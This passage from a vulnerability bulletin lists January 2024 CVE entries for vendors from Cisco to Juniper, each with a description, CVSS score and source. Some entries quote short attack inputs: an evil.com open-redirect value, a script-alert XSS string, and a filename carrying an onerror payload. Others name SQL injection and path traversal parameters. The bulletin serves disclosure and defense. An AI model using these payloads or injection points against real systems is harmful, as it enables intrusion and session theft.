cisco -- epnm | A vulnerability in the web-based management interface of Cisco Prime Infrastructure and Cisco Evolved Programmable Network Manager (EPNM) could allow an authenticated, remote attacker to conduct SQL injection attacks on an affected system. This vulnerability is due to improper validation of user-submitted parameters. An attacker could exploit this vulnerability by authenticating to the application and sending malicious requests to an affected system. A successful exploit could allow the attacker to obtain and modify sensitive information that is stored in the underlying database. | Published 2024-01-17 | CVSS 6.5 | CVE-2023-20271 | Source: ykramarz@cisco.com
cloud_software_group -- citrix_session_recording | Cross Site Scripting vulnerability in Citrix Session Recording allows an attacker to perform Cross Site Scripting. | Published 2024-01-18 | CVSS 5 | CVE-2023-6184 | Source: secure@citrix.com
cloud_software_group -- citrix_storefront | Cross-site scripting (XSS). | Published 2024-01-17 | CVSS 5.4 | CVE-2023-5914 | Source: secure@citrix.com
cloud_software_group -- netscaler_adc | Improper Control of Generation of Code ('Code Injection') in NetScaler ADC and NetScaler Gateway allows an attacker with access to NSIP, CLIP or SNIP with management interface to perform authenticated (low privileged) remote code execution on the Management Interface. | Published 2024-01-17 | CVSS 5.5 | CVE-2023-6548 | Source: secure@citrix.com
cms -- cmseasy | A vulnerability was found in CmsEasy up to 7.7.7. It has been declared as critical. Affected by this vulnerability is the function getslide_child_action in the library lib/admin/language_admin.php. The manipulation of the argument sid leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250693 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | Published 2024-01-14 | CVSS 6.3 | CVE-2024-0523 | Source: cna@vuldb.com
code-projects -- employee_profile_management_system | A vulnerability classified as problematic was found in code-projects Employee Profile Management System 1.0. This vulnerability affects unknown code of the file download.php. The manipulation of the argument download_file leads to path traversal: '../filedir'. The exploit has been disclosed to the public and may be used. VDB-250570 is the identifier assigned to this vulnerability. | Published 2024-01-12 | CVSS 5.3 | CVE-2024-0465 | Source: cna@vuldb.com
codeastro -- real_estate_management_system | A vulnerability classified as critical has been found in CodeAstro Real Estate Management System up to 1.0. This affects an unknown part of the file propertydetail.php. The manipulation of the argument pid leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250713 was assigned to this vulnerability. | Published 2024-01-15 | CVSS 6.3 | CVE-2024-0543 | Source: cna@vuldb.com
codecanyon -- rise_rise_ultimate_project_manager | A vulnerability classified as problematic was found in CodeCanyon RISE Rise Ultimate Project Manager 3.5.3. This vulnerability affects unknown code of the file /index.php/signin. The manipulation of the argument redirect with the input http://evil.com leads to open redirect. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-250714 is the identifier assigned to this vulnerability. | Published 2024-01-15 | CVSS 5.3 | CVE-2024-0545 | Source: cna@vuldb.com
codepeople -- wp_time_slots_booking_form | Missing Authorization vulnerability in CodePeople WP Time Slots Booking Form. This issue affects WP Time Slots Booking Form: from n/a through 1.1.76. | Published 2024-01-17 | CVSS 4.3 | CVE-2022-41790 | Source: audit@patchstack.com
cozmoslabs -- profile_builder | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Cozmoslabs Profile Builder Pro allows Reflected XSS. This issue affects Profile Builder Pro: from n/a through 3.10.0. | Published 2024-01-13 | CVSS 6.1 | CVE-2024-22142 | Source: audit@patchstack.com
d-link -- multiple_products | A vulnerability classified as critical was found in D-Link DAP-1360, DIR-300, DIR-615, DIR-615GF, DIR-615S, DIR-615T, DIR-620, DIR-620S, DIR-806A, DIR-815, DIR-815AC, DIR-815S, DIR-816, DIR-820, DIR-822, DIR-825, DIR-825AC, DIR-825ACF, DIR-825ACG1, DIR-841, DIR-842, DIR-842S, DIR-843, DIR-853, DIR-878, DIR-882, DIR-1210, DIR-1260, DIR-2150, DIR-X1530, DIR-X1860, DSL-224, DSL-245GR, DSL-2640U, DSL-2750U, DSL-G2452GR, DVG-5402G, DVG-5402G, DVG-5402GFRU, DVG-N5402G, DVG-N5402G-IL, DWM-312W, DWM-321, DWR-921, DWR-953 and Good Line Router v2 up to 20240112. This vulnerability affects unknown code of the file /devinfo of the component HTTP GET Request Handler. The manipulation of the argument area with the input notice|net|version leads to information disclosure. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-251542 is the identifier assigned to this vulnerability. | Published 2024-01-19 | CVSS 5.3 | CVE-2024-0717 | Source: cna@vuldb.com
davidjmiller -- voting_record | The Voting Record WordPress plugin through 2.0 does not have a CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make a logged-in admin add Stored XSS payloads via a CSRF attack. | Published 2024-01-16 | CVSS 5.4 | CVE-2023-7083 | Source: contact@wpscan.com
davidjmiller -- voting_record | The Voting Record WordPress plugin through 2.0 is missing sanitisation as well as escaping, which could allow any authenticated users, such as subscribers, to perform Stored XSS attacks. | Published 2024-01-16 | CVSS 5.4 | CVE-2023-7084 | Source: contact@wpscan.com
dedebiz -- dedebiz | A vulnerability has been found in DedeBIZ 6.3.0 and classified as critical. This vulnerability affects unknown code of the file /admin/makehtml_freelist_action.php. The manipulation of the argument startid leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-250726 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | Published 2024-01-15 | CVSS 4.7 | CVE-2024-0558 | Source: cna@vuldb.com
deepfacelab -- deepfacelab | A vulnerability, which was classified as problematic, was found in DeepFaceLab pretrained DF.wf.288res.384.92.72.22. Affected is an unknown function of the file mainscripts/Util.py. The manipulation leads to deserialization. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. VDB-251382 is the identifier assigned to this vulnerability. | Published 2024-01-18 | CVSS 5.3 | CVE-2024-0654 | Source: cna@vuldb.com
discourse -- discourse | Discourse is a platform for community discussion. For fields that are client editable, limits on sizes are not imposed. This allows a malicious actor to cause a Discourse instance to use excessive disk space and also often excessive bandwidth. The issue is patched in 3.1.4 and 3.2.0.beta4. | Published 2024-01-12 | CVSS 4.3 | CVE-2024-21655 | Source: security-advisories@github.com
dogukanurker -- flaskblog | flaskBlog is a simple blog app built with Flask. Improper storage and rendering of the `/user/<user>` page allows a user's comments to execute arbitrary javascript code. The html template `user.html` contains the following code snippet to render comments made by a user: `<div class="content" tag="content">{{comment[2]|safe}}</div>`. Use of the "safe" tag causes flask to _not_ escape the rendered content. To remediate this, simply remove the `|safe` tag from the HTML above. No fix is available and users are advised to manually edit their installation. | Published 2024-01-17 | CVSS 6.5 | CVE-2024-22414 | Source: security-advisories@github.com
easy.jobs -- easy.jobs | The easy.jobs - Best Recruitment Plugin for Job Board Listing, Manager, Career Page for Elementor & Gutenberg WordPress plugin before 2.4.7 does not properly secure some of its AJAX actions, allowing any logged-in users to modify its settings. | Published 2024-01-15 | CVSS 4.3 | CVE-2023-6843 | Source: contact@wpscan.com
easyftp -- easyftp | A vulnerability, which was classified as problematic, has been found in EasyFTP 1.7.0. This issue affects some unknown processing of the component LIST Command Handler. The manipulation leads to denial of service. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250715. | Published 2024-01-15 | CVSS 5.3 | CVE-2024-0546 | Source: cna@vuldb.com
easyftp -- easyftp | A vulnerability, which was classified as critical, was found in EasyFTP 1.7.0.2. Affected is an unknown function of the component MKD Command Handler. The manipulation leads to buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250716. | Published 2024-01-16 | CVSS 6.3 | CVE-2011-10005 | Source: cna@vuldb.com
efs -- easy_chat_server | A vulnerability, which was classified as problematic, has been found in EFS Easy Chat Server 3.1. Affected by this issue is some unknown functionality of the component HTTP GET Request Handler. The manipulation of the argument USERNAME leads to denial of service. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251480. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | Published 2024-01-18 | CVSS 4.3 | CVE-2024-0695 | Source: cna@vuldb.com
efs -- easy_file_sharing_ftp | A vulnerability classified as problematic was found in EFS Easy File Sharing FTP 2.0. Affected by this vulnerability is an unknown functionality. The manipulation of the argument username leads to denial of service. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251479. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | Published 2024-01-18 | CVSS 5.3 | CVE-2024-0693 | Source: cna@vuldb.com
efs -- easy_file_sharing_ftp | A vulnerability classified as problematic has been found in EFS Easy File Sharing FTP 3.6. This affects an unknown part of the component Login. The manipulation of the argument password leads to denial of service. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251559. | Published 2024-01-19 | CVSS 5.3 | CVE-2024-0736 | Source: cna@vuldb.com
estatik -- estatik | The Estatik Real Estate Plugin WordPress plugin before 4.1.1 does not prevent users with low privileges on the site, like subscribers, from setting any of the site's options to 1, which could be used to break sites and lead to DoS when certain options are reset. | Published 2024-01-15 | CVSS 6.5 | CVE-2023-6048 | Source: contact@wpscan.com
estatik -- estatik | The Estatik Real Estate Plugin WordPress plugin before 4.1.1 does not sanitise and escape various parameters and generated URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin. | Published 2024-01-15 | CVSS 6.1 | CVE-2023-6050 | Source: contact@wpscan.com
fabianros -- simple_online_hotel_reservation_system | A vulnerability has been found in code-projects Simple Online Hotel Reservation System 1.0 and classified as problematic. This vulnerability affects unknown code of the file add_reserve.php of the component Make a Reservation Page. The manipulation of the argument Firstname/Lastname with the input <script>alert(1)</script> leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-250618 is the identifier assigned to this vulnerability. | Published 2024-01-13 | CVSS 6.1 | CVE-2024-0504 | Source: cna@vuldb.com
favorites-web_project -- favorites-web | A vulnerability, which was classified as problematic, has been found in cloudfavorites favorites-web 1.3.0. Affected by this issue is some unknown functionality of the component Nickname Handler. The manipulation leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-250238 is the identifier assigned to this vulnerability. | Published 2024-01-12 | CVSS 5.4 | CVE-2022-4960 | Source: cna@vuldb.com
fireeye -- central_management | XSS vulnerability in FireEye Central Management affecting version 9.1.1.956704, which could allow an attacker to modify special HTML elements in the application and cause a reflected XSS, leading to a session hijacking. | Published 2024-01-15 | CVSS 6.1 | CVE-2024-0314 | Source: cve-coordination@incibe.es
fireeye -- hxtool | Cross-Site Scripting in FireEye HXTool affecting version 4.6. This vulnerability allows an attacker to store a specially crafted JavaScript payload in the 'Profile Name' and 'Hostname/IP' parameters that will be triggered when items are loaded. | Published 2024-01-15 | CVSS 6.1 | CVE-2024-0318 | Source: cve-coordination@incibe.es
fireeye -- hxtool | Open Redirect vulnerability in FireEye HXTool affecting version 4.6, the exploitation of which could allow an attacker to redirect a legitimate user to a malicious page by changing the 'redirect_uri' parameter. | Published 2024-01-15 | CVSS 6.1 | CVE-2024-0319 | Source: cve-coordination@incibe.es
fireeye -- malware_analysis | Cross-Site Scripting in FireEye Malware Analysis (AX) affecting version 9.0.3.936530. This vulnerability allows an attacker to send a specially crafted JavaScript payload in the application URL to retrieve the session details of a legitimate user. | Published 2024-01-15 | CVSS 6.1 | CVE-2024-0320 | Source: cve-coordination@incibe.es
fireeye -- fireeye_ex | Cross-Site Scripting in FireEye EX, affecting version 9.0.3.936727. Exploitation of this vulnerability allows an attacker to send a specially crafted JavaScript payload via the 'type' and 's_f_name' parameters to an authenticated user to retrieve their session details. | Published 2024-01-15 | CVSS 5.4 | CVE-2024-0317 | Source: cve-coordination@incibe.es
flycms -- flycms | FlyCms 1.0 is vulnerable to Cross Site Scripting (XSS) in the system website settings website name section. | Published 2024-01-18 | CVSS 5.4 | CVE-2024-22548 | Source: cve@mitre.org
flycms -- flycms | FlyCms 1.0 is vulnerable to Cross Site Scripting (XSS) in the email settings of the website settings section. | Published 2024-01-18 | CVSS 5.4 | CVE-2024-22549 | Source: cve@mitre.org
foru -- cms | A vulnerability classified as problematic was found in ForU CMS up to 2020-06-23. Affected by this vulnerability is an unknown functionality of the file channel.php. The manipulation of the argument c_cmodel leads to file inclusion. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251551. | Published 2024-01-19 | CVSS 4.7 | CVE-2024-0728 | Source: cna@vuldb.com
foru_cms -- foru_cms | A vulnerability, which was classified as critical, has been found in ForU CMS up to 2020-06-23. Affected by this issue is some unknown functionality of the file cms_admin.php. The manipulation of the argument a_name leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251552. | Published 2024-01-19 | CVSS 5.5 | CVE-2024-0729 | Source: cna@vuldb.com
freefloat -- freefloat_server | A vulnerability was found in FreeFloat FTP Server 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the component SIZE Command Handler. The manipulation leads to denial of service. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-250718 is the identifier assigned to this vulnerability. | Published 2024-01-15 | CVSS 5.3 | CVE-2024-0548 | Source: cna@vuldb.com
freesshd -- freesshd | A vulnerability was found in freeSSHd 1.0.9 on Windows. It has been classified as problematic. This affects an unknown part. The manipulation leads to denial of service. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251547. | Published 2024-01-19 | CVSS 5.3 | CVE-2024-0723 | Source: cna@vuldb.com
full_compass_systems -- wic1200 | A Cross-site scripting (XSS) vulnerability has been found on WIC1200, affecting version 1.1. An authenticated user could store a malicious javascript payload in the device model parameter via '/setup/diags_ir_learn.asp', allowing the attacker to retrieve the session details of another user. | Published 2024-01-16 | CVSS 5.5 | CVE-2024-0554 | Source: cve-coordination@incibe.es
full_compass_systems -- wic1200 | A Cross-Site Request Forgery (CSRF) vulnerability has been found on WIC1200, affecting version 1.1. An authenticated user could lead another user into executing unwanted actions inside the application they are logged in to. This vulnerability is possible due to the lack of proper CSRF token implementation. | Published 2024-01-16 | CVSS 4.6 | CVE-2024-0555 | Source: cve-coordination@incibe.es
github -- enterprise_server | An attacker with access to a Management Console user account with the editor role could escalate privileges through a command injection vulnerability in the Management Console. This vulnerability affected all versions of GitHub Enterprise Server and was fixed in versions 3.11.3, 3.10.5, 3.9.8, and 3.8.13. This vulnerability was reported via the GitHub Bug Bounty program. | Published 2024-01-16 | CVSS 6.5 | CVE-2024-0507 | Source: product-cna@github.com
gitlab -- gitlab | An issue has been discovered in GitLab CE/EE affecting all versions from 12.2 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which an attacker could potentially modify the metadata of signed commits. | Published 2024-01-12 | CVSS 5.3 | CVE-2023-2030 | Source: cve@gitlab.com
gitlab -- gitlab | An issue has been discovered in GitLab EE affecting all versions starting from 15.3 before 16.5.6, all versions starting from 16.6 before 16.6.4, all versions starting from 16.7 before 16.7.2. The required CODEOWNERS approval could be bypassed by adding changes to a previously approved merge request. | Published 2024-01-12 | CVSS 5.3 | CVE-2023-4812 | Source: cve@gitlab.com
gitlab -- gitlab | An improper access control vulnerability exists in GitLab Remote Development affecting all versions prior to 16.5.6, 16.6 prior to 16.6.4 and 16.7 prior to 16.7.2. This condition allows an attacker to create a workspace in one group that is associated with an agent from another group. | Published 2024-01-12 | CVSS 5.3 | CVE-2023-6955 | Source: cve@gitlab.com
gl-inet -- gl-ax1800_firmware | An issue was discovered on GL.iNet devices before version 4.5.0. They assign the same session ID after each user reboot, allowing attackers to share session identifiers between different sessions and bypass authentication or access control measures. Attackers can impersonate legitimate users or perform unauthorized actions. This affects A1300 4.4.6, AX1800 4.4.6, AXT1800 4.4.6, MT3000 4.4.6, MT2500 4.4.6, MT6000 4.5.0, MT1300 4.3.7, MT300N-V2 4.3.7, AR750S 4.3.7, AR750 4.3.7, AR300M 4.3.7, and B1300 4.3.7. | Published 2024-01-12 | CVSS 5.5 | CVE-2023-50920 | Source: cve@mitre.org
gnutls -- gnutls | A vulnerability was found in GnuTLS. The response times to malformed ciphertexts in RSA-PSK ClientKeyExchange differ from response times of ciphertexts with correct PKCS#1 v1.5 padding. This issue may allow a remote attacker to perform a timing side-channel attack in the RSA-PSK key exchange, potentially leading to the leakage of sensitive data. CVE-2024-0553 is designated as an incomplete resolution for CVE-2023-5981. | Published 2024-01-16 | CVSS 5.9 | CVE-2024-0553 | Source: secalert@redhat.com
gnutls -- gnutls | A vulnerability was found in GnuTLS, where a cockpit (which uses gnuTLS) rejects a certificate chain with distributed trust. This issue occurs when validating a certificate chain with cockpit-certificate-ensure. This flaw allows an unauthenticated, remote client or attacker to initiate a denial of service attack. | Published 2024-01-16 | CVSS 5.9 | CVE-2024-0567 | Source: secalert@redhat.com
google -- android | In video decoder, there is a possible out of bounds write due to improper input validation. This could lead to local denial of service with no additional execution privileges needed. | Published 2024-01-18 | CVSS 5.5 | CVE-2023-48340 | Source: security@unisoc.com
google -- android | In video decoder, there is a possible out of bounds read due to improper input validation. This could lead to local denial of service with no additional execution privileges needed. | Published 2024-01-18 | CVSS 5.5 | CVE-2023-48341 | Source: security@unisoc.com
google -- android | In video decoder, there is a possible out of bounds write due to improper input validation. This could lead to local denial of service with no additional execution privileges needed. | Published 2024-01-18 | CVSS 5.5 | CVE-2023-48343 | Source: security@unisoc.com
google -- android | In video decoder, there is a possible out of bounds read due to improper input validation. This could lead to local denial of service with no additional execution privileges needed. | Published 2024-01-18 | CVSS 5.5 | CVE-2023-48344 | Source: security@unisoc.com
google -- android | In video decoder, there is a possible out of bounds read due to improper input validation. This could lead to local denial of service with no additional execution privileges needed. | Published 2024-01-18 | CVSS 5.5 | CVE-2023-48345 | Source: security@unisoc.com
google -- android | In video decoder, there is a possible improper input validation. This could lead to local denial of service with no additional execution privileges needed. | Published 2024-01-18 | CVSS 5.5 | CVE-2023-48346 | Source: security@unisoc.com
google -- android | In video decoder, there is a possible out of bounds read due to improper input validation. This could lead to local denial of service with no additional execution privileges needed. | Published 2024-01-18 | CVSS 5.5 | CVE-2023-48347 | Source: security@unisoc.com
google -- android | In video decoder, there is a possible out of bounds write due to improper input validation. This could lead to local denial of service with no additional execution privileges needed. | Published 2024-01-18 | CVSS 5.5 | CVE-2023-48348 | Source: security@unisoc.com
google -- android | In video decoder, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service with no additional execution privileges needed. | Published 2024-01-18 | CVSS 5.5 | CVE-2023-48349 | Source: security@unisoc.com
google -- android | In video decoder, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service with no additional execution privileges needed. | Published 2024-01-18 | CVSS 5.5 | CVE-2023-48350 | Source: security@unisoc.com
google -- android | In video decoder, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service with no additional execution privileges needed. | Published 2024-01-18 | CVSS 5.5 | CVE-2023-48351 | Source: security@unisoc.com
google -- android | In media service, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service with System execution privileges needed. | Published 2024-01-18 | CVSS 4.4 | CVE-2023-48342 | Source: security@unisoc.com
hcl_software -- hcl_bigfix_osd_bare_metal_server_webui | HCL BigFix Bare OSD Metal Server WebUI version 311.19 or lower has missing or insecure tags that could allow an attacker to execute a malicious script on the user's browser. | Published 2024-01-16 | CVSS 5.6 | CVE-2023-37522 | Source: psirt@hcl.com
hcl_software -- hcl_bigfix_osd_bare_metal_server_webui | Missing or insecure tags in the HCL BigFix Bare OSD Metal Server WebUI version 311.19 or lower could allow an attacker to execute a malicious script on the user's browser. | Published 2024-01-16 | CVSS 5.6 | CVE-2023-37523 | Source: psirt@hcl.com
hitachi -- hitachi_device_manager | Generation of Error Message Containing Sensitive Information vulnerability in Hitachi Device Manager on Windows, Linux (Device Manager Agent modules). This issue affects Hitachi Device Manager: before 8.8.5-04. | Published 2024-01-16 | CVSS 5.3 | CVE-2023-49107 | Source: hirt@hitachi.co.jp
hitachi -- hitachi_device_manager | Missing Password Field Masking vulnerability in Hitachi Device Manager on Windows, Linux (Device Manager Agent component). This issue affects Hitachi Device Manager: before 8.8.5-04. | Published 2024-01-16 | CVSS 4.6 | CVE-2023-49106 | Source: hirt@hitachi.co.jp
hitachi -- hitachi_tuning_managerIncorrect Default Permissions vulnerability in Hitachi Tuning Manager on Windows (Hitachi Tuning Manager server component) allows local users to read and write specific files.This issue affects Hitachi Tuning Manager: before 8.8.5-04.2024-01-166.6CVE-2023-6457
hirt@hitachi.co.jp
hongdian -- h8951-4g-esp_firmware
A user's browser may be forced to execute JavaScript and pass the authentication cookie to the attacker, leveraging the XSS vulnerability located at "/gui/terminal_tool.cgi" in the "data" parameter.
Published: 2024-01-12 | CVSS: 6.1 | CVE-2023-49258 | Source: cvd@cert.pl

hongdian -- h8951-4g-esp_firmware
An XSS attack can be performed by changing the MOTD banner and pointing the victim to the "terminal_tool.cgi" path. It can be used together with the vulnerability CVE-2023-49255.
Published: 2024-01-12 | CVSS: 6.1 | CVE-2023-49260 | Source: cvd@cert.pl

huawei -- emui
Unauthorized file access vulnerability in the wallpaper service module. Successful exploitation of this vulnerability may cause features to perform abnormally.
Published: 2024-01-16 | CVSS: 5.3 | CVE-2023-52112 | Source: psirt@huawei.com

huaxia -- erp
A vulnerability was found in Huaxia ERP up to 3.1. It has been rated as problematic. This issue affects some unknown processing of the file /user/getAllList. The manipulation leads to information disclosure. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 3.2 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-250595.
Published: 2024-01-13 | CVSS: 5.3 | CVE-2024-0490 | Source: cna@vuldb.com

huaxia -- erp
A vulnerability classified as problematic has been found in Huaxia ERP up to 3.1. Affected is an unknown function of the file src/main/java/com/jsh/erp/controller/UserController.java. The manipulation leads to weak password recovery. It is possible to launch the attack remotely. Upgrading to version 3.2 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-250596.
Published: 2024-01-13 | CVSS: 5.3 | CVE-2024-0491 | Source: cna@vuldb.com

hyperledger-archives -- ursa
Ursa is a cryptographic library for use with blockchains. The revocation schema that is part of the Ursa CL-Signatures implementations has a flaw that could impact the privacy guarantees defined by the AnonCreds verifiable credential model, allowing a malicious holder of a revoked credential to generate a valid Non-Revocation Proof for that credential as part of an AnonCreds presentation. A verifier may verify a credential from a holder as being "not revoked" when in fact, the holder's credential has been revoked. Ursa has moved to end-of-life status and no fix is expected.
Published: 2024-01-16 | CVSS: 6.5 | CVE-2024-21670 | Source: security-advisories@github.com

hypr -- hypr_workforce
Improper Link Resolution Before File Access ('Link Following') vulnerability in HYPR Workforce Access on Windows allows User-Controlled Filename. This issue affects Workforce Access: before 8.7.
Published: 2024-01-16 | CVSS: 6.4 | CVE-2023-6335 | Source: security@hypr.com

hypr -- workforce_access
Improper Restriction of Operations within the Bounds of a Memory Buffer vulnerability in HYPR Workforce Access on Windows allows Overflow Buffers. This issue affects Workforce Access: before 8.7.
Published: 2024-01-16 | CVSS: 5.3 | CVE-2023-6334 | Source: security@hypr.com

ibm -- maximo_asset_management
IBM Maximo Asset Management 7.6.1.3 and Manage Component 8.10 through 8.11 are vulnerable to cross-site request forgery, which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 271843.
Published: 2024-01-19 | CVSS: 4.3 | CVE-2023-47718 | Source: psirt@us.ibm.com

ibm -- maximo_spatial_asset_management
IBM Maximo Spatial Asset Management 8.10 is vulnerable to server-side request forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system, potentially leading to network enumeration or facilitating other attacks. IBM X-Force ID: 255288.
Published: 2024-01-19 | CVSS: 5.4 | CVE-2023-32337 | Source: psirt@us.ibm.com

ibm -- openpages_with_watson
IBM OpenPages with Watson 8.3 and 9.0 could provide weaker than expected security in an OpenPages environment using Native authentication. If OpenPages is using Native authentication, an attacker with access to the OpenPages database could, through a series of specially crafted steps, exploit this weakness and gain unauthorized access to other OpenPages accounts. IBM X-Force ID: 262594.
Published: 2024-01-19 | CVSS: 6.8 | CVE-2023-38738 | Source: psirt@us.ibm.com

ibm -- sterling_control_center
IBM Sterling Control Center 6.3.0 could allow a remote attacker to traverse directories on the system. An attacker could send a specially crafted URL request containing "dot dot" sequences (/../) to view arbitrary files on the system. IBM X-Force ID: 257874.
Published: 2024-01-19 | CVSS: 5.4 | CVE-2023-35020 | Source: psirt@us.ibm.com

ibm -- storage_defender_data_protect
IBM Storage Defender - Data Protect 1.0.0 through 1.4.1 is vulnerable to HTTP header injection, caused by improper validation of input in the HOST header. This could allow an attacker to conduct various attacks against the vulnerable system, including cross-site scripting, cache poisoning or session hijacking. IBM X-Force ID: 276101.
Published: 2024-01-19 | CVSS: 6.5 | CVE-2023-50963 | Source: psirt@us.ibm.com

idmsistemas -- sinergia_sinergia_2.0,_and_sinergia_corporativo
Omission of user-controlled key authorization in the IDMSistemas platform, affecting the QSige product. This vulnerability allows an attacker to extract sensitive information from the API by making a request to the parameter '/qsige.locator/quotePrevious/centers/X', where X supports values 1, 2, 3, etc.
Published: 2024-01-18 | CVSS: 6.5 | CVE-2024-0580 | Source: cve-coordination@incibe.es

intel -- hid_event_filter
Insecure inherited permissions in some Intel HID Event Filter drivers for Windows 10 for some Intel NUC laptop software installers before version 2.2.2.1 may allow an authenticated user to potentially enable escalation of privilege via local access.
Published: 2024-01-19 | CVSS: 6.7 | CVE-2023-38541 | Source: secure@intel.com

intel -- intel_integrated_sensor_hub_(ish)_driver_for_windows_10_for_intel_nuc_p14e_laptop_element_software_installers
Incorrect default permissions in some Intel Integrated Sensor Hub (ISH) driver for Windows 10 for Intel NUC P14E Laptop Element software installers before version 5.4.1.4479 may allow an authenticated user to potentially enable escalation of privilege via local access.
Published: 2024-01-19 | CVSS: 6.7 | CVE-2023-29244 | Source: secure@intel.com

intel -- intel_nuc_bios_firmware
Improper buffer restrictions for some Intel NUC BIOS firmware before version IN0048 may allow a privileged user to potentially enable escalation of privilege via local access.
Published: 2024-01-19 | CVSS: 6.7 | CVE-2023-28722 | Source: secure@intel.com

intermesh -- groupoffice
Group-Office is an enterprise CRM and groupware tool. Affected versions are subject to a vulnerability which is present in the file upload mechanism of Group Office. It allows an attacker to execute arbitrary JavaScript code by embedding it within a file's name. For instance, using a filename such as "><img src=x onerror=prompt('XSS')>.jpg" triggers the vulnerability. When this file is uploaded, the JavaScript code within the filename is executed. This issue has been addressed in version 6.8.29. All users are advised to upgrade. There are no known workarounds for this vulnerability.
Published: 2024-01-18 | CVSS: 6.5 | CVE-2024-22418 | Source: security-advisories@github.com

jfinalcms -- jfinalcms
A stored XSS vulnerability exists in JFinalcms 5.0.0 via the /gusetbook/save contact parameter, which allows remote attackers to inject arbitrary web script or HTML.
Published: 2024-01-12 | CVSS: 5.4 | CVE-2024-22492 | Source: cve@mitre.org

jfinalcms -- jfinalcms
A stored XSS vulnerability exists in JFinalcms 5.0.0 via the /gusetbook/save content parameter, which allows remote attackers to inject arbitrary web script or HTML.
Published: 2024-01-12 | CVSS: 5.4 | CVE-2024-22493 | Source: cve@mitre.org

jfinalcms -- jfinalcms
A stored XSS vulnerability exists in JFinalcms 5.0.0 via the /gusetbook/save mobile parameter, which allows remote attackers to inject arbitrary web script or HTML.
Published: 2024-01-12 | CVSS: 5.4 | CVE-2024-22494 | Source: cve@mitre.org

juniper -- junos
An Improper Check for Unusual or Exceptional Conditions vulnerability in Juniper DHCP Daemon (jdhcpd) of Juniper Networks Junos OS allows an adjacent, unauthenticated attacker to cause the jdhcpd to consume all the CPU cycles, resulting in a Denial of Service (DoS). On Junos OS devices with forward-snooped-client configured, if an attacker sends a specific DHCP packet to a non-configured interface, this will cause an infinite loop. The DHCP process will have to be restarted to recover the service.
This issue affects Juniper Networks Junos OS:
* All versions earlier than 20.4R3-S9;
* 21.2 versions earlier than 21.2R3-S7;
* 21.3 versions earlier than 21.3R3-S5;
* 21.4 versions earlier than 21.4R3-S5;
* 22.1 versions earlier than 22.1R3-S4;
* 22.2 versions earlier than 22.2R3-S3;
* 22.3 versions earlier than 22.3R3-S2;
* 22.4 versions earlier than 22.4R2-S2, 22.4R3;
* 23.2 versions earlier than 23.2R2.
Published: 2024-01-12 | CVSS: 6.5 | CVE-2023-36842 | Source: sirt@juniper.net

juniper -- junos
An Improper Handling of Exceptional Conditions vulnerability in the broadband edge subscriber management daemon (bbe-smgd) of Juniper Networks Junos OS on MX Series allows an attacker directly connected to the vulnerable system who repeatedly flaps DHCP subscriber sessions to cause a slow memory leak, ultimately leading to a Denial of Service (DoS). Memory can only be recovered by manually restarting bbe-smgd. This issue only occurs if BFD liveness detection for DHCP subscribers is enabled. Systems without BFD liveness detection enabled are not vulnerable to this issue. Indication of the issue can be observed by periodically executing the 'show system processes extensive' command, which will indicate an increase in memory allocation for bbe-smgd. A small amount of memory is leaked every time a DHCP subscriber logs in, which will become visible over time, ultimately leading to memory starvation.
user@junos> show system processes extensive | match bbe-smgd
13071 root 24 0 415M 201M select 0 0:41 7.28% bbe-smgd{bbe-smgd}
13071 root 20 0 415M 201M select 1 0:04 0.00% bbe-smgd{bbe-smgd}
...
user@junos> show system processes extensive | match bbe-smgd
13071 root 20 0 420M 208M select 0 4:33 0.10% bbe-smgd{bbe-smgd}
13071 root 20 0 420M 208M select 0 0:12 0.00% bbe-smgd{bbe-smgd}
...
This issue affects Juniper Networks Junos OS on MX Series:
* All versions earlier than 20.4R3-S9;
* 21.2 versions earlier than 21.2R3-S7;
* 21.3 versions earlier than 21.3R3-S5;
* 21.4 versions earlier than 21.4R3-S5;
* 22.1 versions earlier than 22.1R3-S4;
* 22.2 versions earlier than 22.2R3-S3;
* 22.3 versions earlier than 22.3R3-S2;
